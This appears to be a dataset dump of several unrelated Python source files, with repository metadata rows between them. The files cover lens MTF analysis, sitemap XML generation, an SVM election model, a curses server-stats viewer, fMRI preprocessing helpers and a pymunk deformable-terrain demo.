est_defocus_rms_wfe_step, longitude_defocus_step_um, coc_step, image_distance,\
subject_distance, fit_peak_y, prysm_offset = tup
data.hints['df_step'] = est_defocus_rms_wfe_step
data.hints['df_offset'] = prysm_offset
else:
if p is not None:
if 'df_step' in p:
data.hints['df_step'] = p['df_step']
if 'df_offset' in p:
data.hints['df_offset'] = p['df_offset']
# exit()
mtf_means = sag_ob.sharp_data
fitted_params = cauchy_fit(focus_values, mtf_means)
cauchy_peak_x = fitted_params[1]
cauchy_peak_y = fitted_params[0]
print("Found peak {:.3f} at {:.3f}".format(cauchy_peak_y, cauchy_peak_x))
data.cauchy_peak_x = cauchy_peak_x
if len(wfd) == 0:
data.hints['df_offset'] = (min(focus_values) - 2, cauchy_peak_x, max(focus_values) + 2)
# Move on to get full frequency data
# Find centre index
centre_idx = int(interpolate.InterpolatedUnivariateSpline(focus_values,
range(len(focus_values)),
k=1)(cauchy_peak_x) + 0.5)
if type(fs_slices_) is int:
size = fs_slices_
else:
size = fs_slices_[num]
slicelow = max(avoid_ends_, int(centre_idx - size * skip_ / 2 + 1))
slicehigh = min(slicelow + size, len(mtf_means) - avoid_ends_)
limit = (slicelow, slicehigh)
print("Limit", limit)
sag_data = []
mer_data = []
if complex_otf_:
sagaxis = SAGITTAL_COMPLEX
meraxis = MERIDIONAL_COMPLEX
else:
sagaxis = SAGITTAL
meraxis = MERIDIONAL
if x_loc_ is not None and y_loc_ is not None:
x_test_loc = x_loc_
y_test_loc = y_loc_
else:
x_test_loc = ob_.x_loc
y_test_loc = ob_.y_loc
for freq in config.SPACIAL_FREQS:
print(freq)
sag_ob = focusset.get_interpolation_fn_at_point(x_test_loc, y_test_loc, freq, sagaxis, limit=limit, skip=skip_)
mer_ob = focusset.get_interpolation_fn_at_point(x_test_loc, y_test_loc, freq, meraxis, limit=limit, skip=skip_)
sag_data.append(sag_ob.sharp_data)
mer_data.append(mer_ob.sharp_data)
data.x_loc = x_test_loc
data.y_loc = y_test_loc
sag_mtf_values = np.array(sag_data)
mer_mtf_values = np.array(mer_data)
merged_mtf_values = (sag_mtf_values + mer_mtf_values) * 0.5
mtf_means = np.abs(merged_mtf_values).mean(axis=0)
focus_values = sag_ob.focus_data
max_pos = focus_values[np.argmax(mtf_means)]
diff_mtf = diffraction_mtf(config.SPACIAL_FREQS, focusset.exif.aperture)
diff_mtf_mean = diff_mtf.mean()
strehl_ests = mtf_means / diff_mtf_mean
data.merged_mtf_values = merged_mtf_values
data.sag_mtf_values = sag_mtf_values
data.mer_mtf_values = mer_mtf_values
data.mtf_means = mtf_means
data.focus_values = focus_values
data.max_pos = max_pos
data.strehl_ests = strehl_ests
if num == 0:
data.all_ps = []
weights = get_weights(merged_mtf_values.shape, focus_values, cauchy_peak_x)
assert weights.shape == merged_mtf_values.shape
weightmean = np.mean(weights)
data.weights = weights / weightmean
data.exif = focusset.exif
if return_focusset:
return data, focusset
else:
return data
def pre_process_focussets(focussets, fs_slices, skip, avoid_ends=1, from_scratch=True, x_loc=None, y_loc=None,
complex_otf=True):
# ob = focussets[0].find_sharpest_location()
ob = None
def init():
global focussets_
global fs_slices_
global skip_
global ob_
global from_scratch_
global avoid_ends_
global x_loc_
global y_loc_
global complex_otf_
global all_ps_
focussets_ = focussets
ob_ = ob
skip_ = skip
fs_slices_ = fs_slices
from_scratch_ = from_scratch
avoid_ends_ = avoid_ends
x_loc_ = x_loc
y_loc_ = y_loc
complex_otf_ = complex_otf
all_ps_ = all_ps
if type(focussets[0]) is str:
wfd = read_wavefront_data(focusset_path=focussets[0], x_loc=x_loc, y_loc=y_loc)
try:
dct = wfd[-1][1]
all_ps = convert_wavefront_dicts_to_p_dicts(dct)
except IndexError:
all_ps = None
if not config.DISABLE_MULTIPROCESSING:
pool = multiprocessing.Pool(initializer=init)
datas = pool.map(_process_focusset, range(len(focussets)))
else:
init()
datas = [_process_focusset(_) for _ in range(len(focussets))]
if type(focussets[0]) is str:
datas, focussets = zip(*datas)
# if 'all_ps' in datas[0]:
# for p, data in zip(datas[0].all_ps[1:], datas[1:]):
# data.hints = [("", p)]
#
# If data is old and saved before fstop data masking compensated in try_wavefront()
#
df_steps = [(data, data.wavefront_data[-1][1].get('p.opt:df_step')) for data in datas if 'p.opt:df_step' in data.wavefront_data[-1][1]]
print(df_steps)
if len(df_steps) > 1:
data_with_steps, steps = zip(*df_steps)
if np.all(np.diff(steps) > 0):
base_fstop = datas[0].exif.aperture
for data, step in df_steps[1:]:
fstop = data.exif.aperture
data.wavefront_data[-1][1]['p.opt:df_step'] *= (base_fstop / fstop) ** 2
return datas, focussets
def jitterstats():
errs = 0
max = 0
hints = 0
random.seed(145)
np.random.seed(145)
num = 20
for a in range(num):
data = build_synthetic_dataset(subsets=1, test_stopdown=2, base_aperture=1.4, slices_per_fstop=19)[0]
err = data.jittererr
maxerr = data.jittererrmax
hint = data.hintjit
if maxerr > max:
max = maxerr
errs += err
hints += hint
print(errs / num)
print(maxerr)
print(hints / num)
def plot_nominal_psf(*args, wfdd={}, x_loc=IMAGE_WIDTH/2, y_loc=IMAGE_HEIGHT/2):
# plt.cla()
# plt.close()
disable_plot = False
defocuses = [-2.4, 0, 2.4, 4.8]
defocus_amount = 2
defocuses = np.linspace(-defocus_amount, defocus_amount, 5)
if not disable_plot:
f, axes = plt.subplots(len(args), len(defocuses), sharey=True, sharex=True)
if len(args) == 1:
axes = axes
min_fstop = min(p['fstop'] for p in args)
for na, dct in enumerate(args):
df_offset = dct["df_offset"]
for nd, defocus in enumerate(defocuses):
alter = (dct['fstop'] / min_fstop) ** 2
# alter = 1
s = TestSettings(dct, defocus=defocus / alter + df_offset)
# s.p = dict(base_fstop=1.2, fstop=1.2 * 2 ** (na / 2), df_offset=dct['df_offset'], df_step=dct['df_step'],
# v_scr=1, lca_slr=0, spca2=0.0)
# s.p['v_y'] = -0.6
# s.p['v_slr'] = 0
s.x_loc = x_loc
s.y_loc = y_loc
# s.p['loca'] = 0
# s.p['loca1'] = 0
# s.p['spca2'] = 0
# s.p['spca'] = 0
# s.p['z9'] += 0.08
# s.p['z10'] = 0
# s.p['z11'] = 0
# s.p['tca_slr'] = 1
s.return_psf = True
s.pixel_vignetting = True
s.lens_vignetting = True
s.phasesamples = 384
s.fftsize = 768
psf = generate(s).psf
# zs = {}
# for key, value in dct.items():
# if key[0].lower() == 'z' and key[1].isdigit():
# zs[key] = value
# elif key[0:7].lower() == 'p.opt:z' and key[7].isdigit():
# zs[key[6:]] = value
# zs['z4'] = defocus
# print(zs)
# pupil = prysm.FringeZernike(**zs, norm=True, dia=10)
# psf = prysm.PSF.from_pupil(pupil, efl=30, Q=5)
if not disable_plot:
if len(args) == 1:
ax = axes[nd]
else:
ax = axes[na, nd]
psf.plot2d(ax=ax, fig=f, axlim=defocus_amount*6)
plt.show()
def build_normalised_scale_dictionary(gradients, ordering, target=1.0):
listdct = {}
for gradient, (pname, applies, _) in zip(gradients, ordering):
if pname not in listdct:
listdct[pname] = []
for _ in applies:
listdct[pname].append(target * gradient ** 0.5)
dct = {}
for k, v in listdct.items():
dct[k] = abs(np.array(v).mean())
return dct
| 34.041096 | 139 | 0.599034 |
ace966dd03115efb54172fe0901f6af22031ae0a | 2,282 | py | Python | sitemap42/__init__.py | andrewp-as-is/sitemap42.py | 196fdfa8693daab7dba5aa3496af8a48daa7a691 | [
"Unlicense"
] | 1 | 2022-02-27T15:22:16.000Z | 2022-02-27T15:22:16.000Z | sitemap42/__init__.py | andrewp-as-is/sitemap42.py | 196fdfa8693daab7dba5aa3496af8a48daa7a691 | [
"Unlicense"
] | null | null | null | sitemap42/__init__.py | andrewp-as-is/sitemap42.py | 196fdfa8693daab7dba5aa3496af8a48daa7a691 | [
"Unlicense"
] | null | null | null | __all__ = ['Sitemap', 'Siteindex']
import io
import xml.dom.minidom
import xml.etree.cElementTree as etree
import xml.etree.ElementTree as ElementTree
XMLNS = "http://www.sitemaps.org/schemas/sitemap/0.9"
CHANGEFREQ = ['always', 'hourly', 'daily', 'weekly',
'monthly', 'yearly', 'never']
class Root:
root_tag = None
element_tag = None
def __init__(self, items=None):
if not items:
items = []
self.items = items
def append(self, loc, **kwargs):
kwargs['loc'] = loc
self.items.append(kwargs)
def _to_etree(self):
root = etree.Element(self.root_tag)
root.attrib['xmlns'] = XMLNS
for item in self.items:
doc = etree.SubElement(root, self.element_tag)
etree.SubElement(doc, 'loc').text = item['loc']
if 'lastmod' in item:
lastmod = item['lastmod'].strftime('%Y-%m-%d')
etree.SubElement(doc, 'lastmod').text = lastmod
if 'changefreq' in item:
changefreq = item['changefreq']
if changefreq not in CHANGEFREQ:
raise ValueError('invalid changefreq: %s' % changefreq)
etree.SubElement(doc, 'changefreq').text = changefreq
if 'priority' in item:
etree.SubElement(
doc, 'priority').text = '%0.1f' % item['priority']
tree = etree.ElementTree(root)
return tree
def tostring(self):
tree = self._to_etree()
with io.BytesIO() as f:
tree.write(f, encoding='utf-8', xml_declaration=False)
string = f.getvalue().decode('utf-8')
string = string.replace('<?xml version="1.0" ?>',
'<?xml version="1.0" encoding="UTF-8"?>')
dom = xml.dom.minidom.parseString(string)
return dom.toprettyxml(encoding="utf-8").decode("utf-8")
def write(self, filename):
tree = self._to_etree()
tree.write(filename, encoding='utf-8', xml_declaration=True)
def __str__(self):
return self.tostring()
class Sitemap(Root):
root_tag = 'urlset'
element_tag = 'url'
class Sitemapindex(Root):
root_tag = 'sitemapindex'
element_tag = 'sitemap'
| 31.694444 | 77 | 0.569676 |
ace967736ea5d83dc3f8be0e43f42029fbb908bd | 409 | py | Python | PythonLibraries/html5lib/0.9.9/package.py | cashmerepipeline/CashmereRez | 13a73931d715ffac27c337abcd6df97b5c47534b | [
"MIT"
] | null | null | null | PythonLibraries/html5lib/0.9.9/package.py | cashmerepipeline/CashmereRez | 13a73931d715ffac27c337abcd6df97b5c47534b | [
"MIT"
] | null | null | null | PythonLibraries/html5lib/0.9.9/package.py | cashmerepipeline/CashmereRez | 13a73931d715ffac27c337abcd6df97b5c47534b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
name = u'html5lib'
version = '0.9.9'
description = \
"""
html5lib library
"""
requires = [ ]
variants = []
def commands():
import os
html5lib_libs_path = os.path.join(getenv("PYTHON_LIBS_PATH"), "html5lib", "%s"%version)
# env.PATH.append(os.path.join(html5lib_libs_path, 'lib'))
env.PYTHONPATH.append(os.path.join(html5lib_libs_path, 'lib'))
| 17.041667 | 91 | 0.621027 |
ace967a97b074106f8a48a56966aafd366874ff3 | 2,602 | py | Python | src/tec/ic/ia/p1/g08_svm.py | Fuabioo/Proyecto-Corto-2-3 | 44bdfd5f2774e2d0d8c8af79dc55dac340f6f4b0 | [
"MIT"
] | null | null | null | src/tec/ic/ia/p1/g08_svm.py | Fuabioo/Proyecto-Corto-2-3 | 44bdfd5f2774e2d0d8c8af79dc55dac340f6f4b0 | [
"MIT"
] | null | null | null | src/tec/ic/ia/p1/g08_svm.py | Fuabioo/Proyecto-Corto-2-3 | 44bdfd5f2774e2d0d8c8af79dc55dac340f6f4b0 | [
"MIT"
] | 1 | 2021-10-20T22:13:04.000Z | 2021-10-20T22:13:04.000Z | import numpy
import pandas
from tec.ic.ia.p1 import g08_data
from tec.ic.ia.pc1 import g08
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
def non_shuffling_train_test_split(X, y, test_size=0.2):
i = int((1 - test_size) * X.shape[0]) + 1
X_train, X_test = numpy.split(X, [i])
y_train, y_test = numpy.split(y, [i])
return X_train, X_test, y_train, y_test
def execute_model(dataset, test_percentage):
[X1, Y1],[X2, Y2],[X3, Y3] = g08_data.shaped_data2(dataset)
x_train, x_test, y_train, y_test = non_shuffling_train_test_split(X1, Y1, test_percentage/100)
model = LinearSVC()
model.fit(x_train, y_train.ravel())
#Calculate Test Prediction
predictions = model.predict(x_train)
first = [g08.PARTIDOS[int(predictions[i])] for i in range(len(predictions))]
predictions = model.predict(x_test)
first += [g08.PARTIDOS[int(predictions[i])] for i in range(len(predictions))]
first_acc_train = model.score(x_train,y_train.ravel())
first_acc = model.score(x_test,y_test.ravel())
x_train, x_test, y_train, y_test = non_shuffling_train_test_split(X2, Y2, test_percentage/100)
model = LinearSVC()
model.fit(x_train, y_train.ravel())
#Calculate Test Prediction
predictions = model.predict(x_train)
second = [g08.PARTIDOS2[int(predictions[i])] for i in range(len(predictions))]
predictions = model.predict(x_test)
second += [g08.PARTIDOS2[int(predictions[i])] for i in range(len(predictions))]
second_acc_train = model.score(x_train,y_train.ravel())
second_acc = model.score(x_test,y_test.ravel())
x_train, x_test, y_train, y_test = non_shuffling_train_test_split(X3, Y3, test_percentage/100)
model = LinearSVC()
model.fit(x_train, y_train.ravel())
#Calculate Test Prediction
predictions = model.predict(x_train)
third = [g08.PARTIDOS2[int(predictions[i])] for i in range(len(predictions))]
predictions = model.predict(x_test)
third += [g08.PARTIDOS2[int(predictions[i])] for i in range(len(predictions))]
third_acc_train = model.score(x_train,y_train.ravel())
third_acc = model.score(x_test,y_test.ravel())
#print(first)
print(first_acc)
print()
#print(second)
print(second_acc)
print()
#print(third)
print(third_acc)
finalDict = {
'res_1': first,
'res_2': second,
'res_3': third,
'err_train': (first_acc+second_acc+third_acc)/3,
'err_test': (first_acc_train+second_acc_train+third_acc_train)/3,
'train_set': [True]*len(X1)+[False]*len(Y1)
}
return finalDict
execute_model(g08.generar_muestra_pais(10000,1),20) | 24.092593 | 95 | 0.708301 |
ace969438dd49c83b5f0d91b5c260e7146d1d8f5 | 10,043 | py | Python | chem/root/pysvr/chem.py | justletterh/hreqdotxyz | 6f56bb3c6f9e1a0475b5ac3995ec02c083db17e9 | [
"CC0-1.0"
] | null | null | null | chem/root/pysvr/chem.py | justletterh/hreqdotxyz | 6f56bb3c6f9e1a0475b5ac3995ec02c083db17e9 | [
"CC0-1.0"
] | null | null | null | chem/root/pysvr/chem.py | justletterh/hreqdotxyz | 6f56bb3c6f9e1a0475b5ac3995ec02c083db17e9 | [
"CC0-1.0"
] | null | null | null | import sys,os
import curses
import aiohttp
import asyncio
import json
print('loading...')
async def main():
async with aiohttp.ClientSession() as session:
async with session.get('http://167.99.100.83:8080/status', headers={'auth': 'PASSWORD'}) as resp:
global stats
txt = await resp.text()
stats = json.loads(txt)
asyncio.run(main())
psys = stats['sys']
ppc = psys['sys']
pcpu = psys['cpu']
pmem = psys['mem']
pswp = psys['mem']['swap']
pnet = psys['net']
pio = psys['io']
ppy = stats['py']
pover = stats['other-versions']
def strfix(str, tabin=1, prelen=0):
tabnum = tabin*4
tabnum = tabnum+prelen
tabstr = " "*tabnum
tabstr = "\n"+tabstr
str = str.replace("\n", tabstr)
return str
def draw_menu2(stdscr):
k = 0
cursor_x = 0
cursor_y = 0
stdscr.clear()
stdscr.refresh()
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(4, curses.COLOR_RED, curses.COLOR_WHITE)
while (k != ord('q')):
if k == ord('l'):
main()
return
if k == ord('p'):
main()
return
stdscr.clear()
height, width = stdscr.getmaxyx()
if k == curses.KEY_DOWN:
cursor_y = cursor_y + 1
elif k == curses.KEY_UP:
cursor_y = cursor_y - 1
elif k == curses.KEY_RIGHT:
cursor_x = cursor_x + 1
elif k == curses.KEY_LEFT:
cursor_x = cursor_x - 1
cursor_x = max(0, cursor_x)
cursor_x = min(width-1, cursor_x)
cursor_y = max(0, cursor_y)
cursor_y = min(height-1, cursor_y)
title = "stats"[:width-1]
subtitle = "as of rn"[:width-1]
keystr = "Last key pressed: {}".format(k)[:width-1]
statusbarstr = "Press 'q' to exit and 'l' or 'p' to go to the previous page | Pos: {}, {}".format(cursor_x, cursor_y)
if k == 0:
keystr = "No key press detected..."[:width-1]
start_x_title = int((width // 2) - (len(title) // 2) - len(title) % 2)
start_x_subtitle = int((width // 2) - (len(subtitle) // 2) - len(subtitle) % 2)
start_x_keystr = int((width // 2) - (len(keystr) // 2) - len(keystr) % 2)
start_y = int((height // 2) - 2)
tab = 4
htab = 2
count = 0
cond = True
while cond:
count = count + 1
stdscr.addstr(count, 20, '\u2063')
if count == height-2:
cond = False
stdscr.attron(curses.color_pair(2))
stdscr.attron(curses.A_UNDERLINE)
stdscr.attron(curses.A_BOLD)
stdscr.addstr(1, 0, 'other versions: ')
stdscr.attroff(curses.A_UNDERLINE)
stdscr.addstr(2, tab*1, 'nginx: ')
stdscr.addstr(3, tab*1, 'apt: ')
stdscr.addstr(4, tab*1, 'nano: ')
stdscr.attroff(curses.A_BOLD)
stdscr.attroff(curses.color_pair(2))
stdscr.attron(curses.color_pair(1))
stdscr.addstr(2, 7+tab*1, strfix(f'{pover["nginx"]}', 1, 7))
stdscr.addstr(3, 5+tab*1, strfix(f'{pover["apt"]}', 1, 5))
stdscr.addstr(4, 6+tab*1, strfix(f'{pover["nano"]}', 1, 6))
stdscr.attroff(curses.color_pair(1))
name = 'STATS'
stdscr.attron(curses.color_pair(4))
stdscr.attron(curses.A_BOLD)
stdscr.addstr(0, start_x_title, name)
stdscr.addstr(0,0, ' '*start_x_title)
stdscr.addstr(0, len(name)+start_x_title, " " * (width - len(name) - 1-start_x_title))
stdscr.attroff(curses.A_BOLD)
stdscr.attroff(curses.color_pair(4))
stdscr.attron(curses.color_pair(3))
stdscr.addstr(height-1, 0, statusbarstr)
stdscr.addstr(height-1, len(statusbarstr), " " * (width - len(statusbarstr) - 1))
stdscr.attroff(curses.color_pair(3))
stdscr.move(cursor_y, cursor_x)
stdscr.refresh()
k = stdscr.getch()
def draw_menu(stdscr):
k = 0
cursor_x = 0
cursor_y = 0
stdscr.clear()
stdscr.refresh()
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(4, curses.COLOR_RED, curses.COLOR_WHITE)
while (k != ord('q')):
if k == ord('n'):
main2()
return
stdscr.clear()
height, width = stdscr.getmaxyx()
if k == curses.KEY_DOWN:
cursor_y = cursor_y + 1
elif k == curses.KEY_UP:
cursor_y = cursor_y - 1
elif k == curses.KEY_RIGHT:
cursor_x = cursor_x + 1
elif k == curses.KEY_LEFT:
cursor_x = cursor_x - 1
cursor_x = max(0, cursor_x)
cursor_x = min(width-1, cursor_x)
cursor_y = max(0, cursor_y)
cursor_y = min(height-1, cursor_y)
title = "stats"[:width-1]
subtitle = "as of rn"[:width-1]
keystr = "Last key pressed: {}".format(k)[:width-1]
statusbarstr = "Press 'q' to exit and 'n' to go to the next page | Pos: {}, {}".format(cursor_x, cursor_y)
if k == 0:
keystr = "No key press detected..."[:width-1]
start_x_title = int((width // 2) - (len(title) // 2) - len(title) % 2)
start_x_subtitle = int((width // 2) - (len(subtitle) // 2) - len(subtitle) % 2)
start_x_keystr = int((width // 2) - (len(keystr) // 2) - len(keystr) % 2)
start_y = int((height // 2) - 2)
tab = 4
htab = 2
count = 0
cond = True
while cond:
count = count + 1
stdscr.addstr(count, 20, '\u2063')
if count == height-2:
cond = False
stdscr.attron(curses.color_pair(2))
stdscr.attron(curses.A_UNDERLINE)
stdscr.attron(curses.A_BOLD)
stdscr.addstr(1, 0, 'system:')
stdscr.addstr(2, tab*1, 'computer:')
stdscr.addstr(9, tab*1, 'cpu:')
stdscr.addstr(14, tab*1, 'memory:')
stdscr.addstr(19, tab*2, 'swap:')
stdscr.addstr(24, tab*1, 'network:')
stdscr.addstr(29, tab*1, 'input/output:')
stdscr.addstr(32, 0, 'python:')
stdscr.attroff(curses.A_UNDERLINE)
stdscr.addstr(3, tab*2, 'os: ')
stdscr.addstr(4, tab*2, 'name: ')
stdscr.addstr(5, tab*2, 'os release: ')
stdscr.addstr(6, tab*2, 'os version: ')
stdscr.addstr(7, tab*2, 'architecture: ')
stdscr.addstr(8, tab*2, 'boot time: ')
stdscr.addstr(10, tab*2, 'current frequency: ')
stdscr.addstr(11, tab*2, 'physical cores: ')
stdscr.addstr(12, tab*2, 'total cores: ')
stdscr.addstr(13, tab*2, 'usage: ')
stdscr.addstr(15, tab*2, 'total: ')
stdscr.addstr(16, tab*2, 'avaliable: ')
stdscr.addstr(17, tab*2, 'used: ')
stdscr.addstr(18, tab*2, 'percent free: ')
stdscr.addstr(20, tab*3, 'total: ')
stdscr.addstr(21, tab*3, 'free: ')
stdscr.addstr(22, tab*3, 'used: ')
stdscr.addstr(23, tab*3, 'percent used: ')
stdscr.addstr(25, tab*2, 'interface name: ')
stdscr.addstr(26, tab*2, 'ip: ')
stdscr.addstr(27, tab*2, 'netmask: ')
stdscr.addstr(28, tab*2, 'broadcast ip: ')
stdscr.addstr(30, tab*2, 'sent: ')
stdscr.addstr(31, tab*2, 'received: ')
stdscr.addstr(33, tab*1, 'version: ')
stdscr.addstr(35, tab*1, 'version info: ')
stdscr.attroff(curses.A_BOLD)
stdscr.attroff(curses.color_pair(2))
stdscr.attron(curses.color_pair(1))
stdscr.addstr(3, 4+tab*2, f'{ppc["os"]}')
stdscr.addstr(4, 6+tab*2, f'{ppc["node"]}')
stdscr.addstr(5, 12+tab*2, f'{ppc["release"]}')
stdscr.addstr(6, 12+tab*2, f'{ppc["ver"]}')
stdscr.addstr(7, 14+tab*2, f'{ppc["arch"]}')
stdscr.addstr(8, 11+tab*2, f'{ppc["start"]}')
stdscr.addstr(10, 19+tab*2, f'{pcpu["curfreq"]}')
stdscr.addstr(11, 16+tab*2, f'{pcpu["phys"]}')
stdscr.addstr(12, 13+tab*2, f'{pcpu["total"]}')
stdscr.addstr(13, 7+tab*2, f'{pcpu["use"]}')
stdscr.addstr(15, 7+tab*2, f'{pmem["total"]}')
stdscr.addstr(16, 11+tab*2, f'{pmem["avaliable"]}')
stdscr.addstr(17, 6+tab*2, f'{pmem["used"]}')
stdscr.addstr(18, 14+tab*2, f'{pmem["percnt"]}')
stdscr.addstr(20, 7+tab*3, f'{pswp["total"]}')
stdscr.addstr(21, 6+tab*3, f'{pswp["free"]}')
stdscr.addstr(22, 6+tab*3, f'{pswp["used"]}')
stdscr.addstr(23, 14+tab*3, f'{pswp["percnt"]}')
stdscr.addstr(25, 16+tab*2, f'{pnet["name"]}')
stdscr.addstr(26, 4+tab*2, f'{pnet["ip"]}')
stdscr.addstr(27, 9+tab*2, f'{pnet["mask"]}')
stdscr.addstr(28, 14+tab*2, f'{pnet["bip"]}')
stdscr.addstr(30, 6+tab*2, f'{pio["sent"]}')
stdscr.addstr(31, 10+tab*2, f'{pio["rcved"]}')
stdscr.addstr(33, 9+tab*1, strfix(f'{ppy["ver"]}', 1, 9))
stdscr.addstr(35, 14+tab*1, f'{ppy["verinf"]}')
stdscr.attroff(curses.color_pair(1))
name = 'STATS'
stdscr.attron(curses.color_pair(4))
stdscr.attron(curses.A_BOLD)
stdscr.addstr(0, start_x_title, name)
stdscr.addstr(0,0, ' '*start_x_title)
stdscr.addstr(0, len(name)+start_x_title, " " * (width - len(name) - 1-start_x_title))
stdscr.attroff(curses.A_BOLD)
stdscr.attroff(curses.color_pair(4))
stdscr.attron(curses.color_pair(3))
stdscr.addstr(height-1, 0, statusbarstr)
stdscr.addstr(height-1, len(statusbarstr), " " * (width - len(statusbarstr) - 1))
stdscr.attroff(curses.color_pair(3))
stdscr.move(cursor_y, cursor_x)
stdscr.refresh()
k = stdscr.getch()
def main():
curses.wrapper(draw_menu)
def main2():
curses.wrapper(draw_menu2)
if __name__ == "__main__":
main() | 40.659919 | 125 | 0.562581 |
ace969d4f7d10db3c0750568fd46bab02504a765 | 4,808 | py | Python | cogspaces/preprocessing.py | arthurmensch/cogspaces | 497c5202405a85981f2bcddff0609d2af2acdbfd | [
"BSD-2-Clause"
] | 27 | 2017-11-01T21:01:56.000Z | 2022-03-28T22:36:31.000Z | cogspaces/preprocessing.py | arthurmensch/cogspaces | 497c5202405a85981f2bcddff0609d2af2acdbfd | [
"BSD-2-Clause"
] | 2 | 2018-09-11T18:47:03.000Z | 2019-08-08T14:17:33.000Z | cogspaces/preprocessing.py | arthurmensch/cogspaces | 497c5202405a85981f2bcddff0609d2af2acdbfd | [
"BSD-2-Clause"
] | 10 | 2017-11-12T20:55:58.000Z | 2021-05-11T22:09:39.000Z | """
Preprocessing helpers for multi-study input.
"""
import warnings
from typing import Dict
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.preprocessing import StandardScaler, LabelEncoder
warnings.filterwarnings('ignore', category=DeprecationWarning,
module=r'sklearn.preprocessing.label.*')
class MultiStandardScaler(BaseEstimator, TransformerMixin):
"""Simple wrapper around StandardScaler to handle multipe datasets.
Attributes
----------
self.sc_: dict, Dictionaries indexed by study, owning all StandardScaler
for each study
"""
def fit(self, data):
self.sc_ = {}
for study, this_data in data.items():
self.sc_[study] = StandardScaler().fit(this_data)
# self.sc_[study].scale_ /= np.sqrt(len(this_data))
return self
def transform(self, data):
transformed = {}
for study, this_data in data.items():
transformed[study] = self.sc_[study].transform(this_data)
return transformed
def inverse_transform(self, data):
transformed = {}
for study, this_data in data.items():
transformed[study] = self.sc_[study].inverse_transform(this_data)
return transformed
@property
def scale_(self):
return {study: sc.scale_ for study, sc in self.sc_.items()}
@property
def mean_(self):
return {study: sc.mean_ for study, sc in self.sc_.items()}
class MultiTargetEncoder(BaseEstimator, TransformerMixin):
""""
Transformer that numericalize task fMRI data.
"""
def fit(self, targets: Dict[str, pd.DataFrame]) -> 'MultiTargetEncoder':
"""
Fit the target encoders necessary for dataframe numericalization.
Parameters
----------
targets : Dict[str, pd.DataFrame]
Dictionary of dataframes associated to single studies. Each
dataframe must contain
the columns ['study', 'subject', 'contrast', 'study_contrast']
Returns
-------
self: MultiTargetEncoder
"""
self.le_ = {}
study_contrasts = pd.concat([target['study_contrast']
for target in targets.values()])
studies = pd.concat([target['study'] for target in targets.values()])
le_study_contrast = LabelEncoder().fit(study_contrasts)
le_study = LabelEncoder().fit(studies)
for study, target in targets.items():
self.le_[study] = dict(
contrast=LabelEncoder().fit(target['contrast']),
subject=LabelEncoder().fit(target['subject']),
study_contrast=le_study_contrast,
study=le_study,
)
return self
def transform(self, targets):
"""
Transform named targets into numericalized targets.
Parameters
----------
targets : Dict[str, pd.DataFrame]
Dictionary of dataframes associated to single studies. Each
dataframe must contain
the columns ['study', 'subject', 'contrast', 'study_contrast']
Returns
-------
numericalized_targets: Dict[str, pd.DataFrame]
Dictionary of dataframes associated to single studies,
where each column is numericalized.
"""
res = {}
for study, target in targets.items():
d = self.le_[study]
res[study] = target.apply(lambda x: d[x.name].transform(x) if x.name in self.le_[study] else x)
return res
def inverse_transform(self, targets):
"""
Transform numericalized targets into named targets.
Parameters
----------
targets: Dict[str, pd.DataFrame]
Dictionary of dataframes associated to single studies,
where each column is numericalized. Each dataframe must contain
the columns ['study', 'subject', 'contrast', 'study_contrast']
Returns
-------
named_targets : Dict[str, pd.DataFrame]
Dictionary of dataframes associated to single studies. Each
dataframe must contain
the columns ['study', 'subject', 'contrast', 'study_contrast']
"""
res = {}
for study, target in targets.items():
d = self.le_[study]
res[study] = target.apply(lambda x: d[x.name].inverse_transform(x))
return res
@property
def classes_(self):
"""
Returns
-------
classes_: Dict[List[str]]
Dictionary of classes list for the contrast `target_encoder`.
"""
return {study: le['contrast'].classes_ for study, le in
self.le_.items()}
| 31.424837 | 107 | 0.596506 |
ace96b02b217955f086084c5da9b8deeabc52725 | 4,755 | py | Python | examples/deformable.py | conductiveIT/pymunk-1 | 61de8b2e652503356ac14a2d648cc11aa6a8070f | [
"MIT"
] | 670 | 2015-01-01T19:10:15.000Z | 2022-03-29T23:05:47.000Z | examples/deformable.py | reter695/pymunk | 9e9d3bf14cd57f61006588b1c56fefc21b453733 | [
"MIT"
] | 122 | 2015-01-02T19:06:19.000Z | 2022-03-20T19:44:25.000Z | examples/deformable.py | reter695/pymunk | 9e9d3bf14cd57f61006588b1c56fefc21b453733 | [
"MIT"
] | 222 | 2015-01-28T03:34:52.000Z | 2022-03-27T06:44:52.000Z | """This is an example on how the autogeometry can be used for deformable
terrain.
"""
__docformat__ = "reStructuredText"
import sys
import pygame
import pymunk
import pymunk.autogeometry
import pymunk.pygame_util
from pymunk import BB
def draw_helptext(screen):
font = pygame.font.Font(None, 16)
text = [
"LMB(hold): Draw pink color",
"LMB(hold) + Shift: Create balls",
"g: Generate segments from pink color drawing",
"r: Reset",
]
y = 5
for line in text:
text = font.render(line, 1, pygame.Color("black"))
screen.blit(text, (5, y))
y += 10
def generate_geometry(surface, space):
for s in space.shapes:
if hasattr(s, "generated") and s.generated:
space.remove(s)
def sample_func(point):
try:
p = int(point[0]), int(point[1])
color = surface.get_at(p)
return color.hsla[2] # use lightness
except Exception as e:
print(e)
return 0
line_set = pymunk.autogeometry.march_soft(
BB(0, 0, 599, 599), 60, 60, 90, sample_func
)
for polyline in line_set:
line = pymunk.autogeometry.simplify_curves(polyline, 1.0)
for i in range(len(line) - 1):
p1 = line[i]
p2 = line[i + 1]
shape = pymunk.Segment(space.static_body, p1, p2, 1)
shape.friction = 0.5
shape.color = pygame.Color("red")
shape.generated = True
space.add(shape)
def main():
pygame.init()
screen = pygame.display.set_mode((600, 600))
clock = pygame.time.Clock()
space = pymunk.Space()
space.gravity = 0, 980
static = [
pymunk.Segment(space.static_body, (0, -50), (-50, 650), 5),
pymunk.Segment(space.static_body, (0, 650), (650, 650), 5),
pymunk.Segment(space.static_body, (650, 650), (650, -50), 5),
pymunk.Segment(space.static_body, (-50, -50), (650, -50), 5),
]
for s in static:
